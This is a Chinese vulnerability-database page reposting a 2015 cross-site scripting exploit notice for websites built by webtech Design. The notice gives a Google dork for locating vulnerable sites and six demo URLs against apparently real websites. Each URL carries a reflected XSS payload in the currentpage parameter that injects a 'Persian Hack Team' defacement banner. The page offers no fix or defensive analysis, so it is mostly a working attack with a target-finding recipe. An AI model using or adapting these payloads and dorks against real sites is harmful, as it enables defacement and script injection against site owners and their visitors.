webtech Design Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040639 漏洞类型
发布时间 2015-12-21 更新时间 2015-12-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120236
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
######################
# Exploit Title :  webtech Design Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage :   http://www.webtech.com.tw/
# Google Dork : "Design by webtech" inurl:news_detail.php
# Date: 2015/12/20
#
#######################
#
# Demo:
#
#http://www.ehoXoray.net/news.php?lang=eng&id=1&currentpage=2%22%3E%3Cmarquee%3E%3Ch1%3EPersian%20Hack%20Team%3C/h1%3E%3C/marquee%3E
#
#http://www.mXinngworld.com/news.php?lang=eng&id=1&currentpage=2%22%3E%3Cmarquee%3E%3Ch1%3EPersian%20Hack%20Team%3C/h1%3E%3C/marquee%3E
#
#http://www.Xhopetennisacademy.com/news.php?lang=eng&id=1&currentpage=2%22%3E%3Cmarquee%3E%3Ch1%3EPersian%20Hack%20Team%3C/h1%3E%3C/marquee%3E
#
#https://wwXw.newstarcut.com/news.php?lang=eng&id=1&currentpage=2%22%3E%3Cmarquee%3E%3Ch1%3EPersian%20Hack%20Team%3C/h1%3E%3C/marquee%3E
#
#http://wwXw.yuanbao-gong.org.tw/news.php?lang=eng&id=1&currentpage=2%22%3E%3Cmarquee%3E%3Ch1%3EPersian%20Hack%20Team%3C/h1%3E%3C/marquee%3E
#
#http://yXlienbaodou.com/news.php?lang=eng&id=1&currentpage=2%22%3E%3Cmarquee%3E%3Ch1%3EPersian%20Hack%20Team%3C/h1%3E%3C/marquee%3E
#
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
######################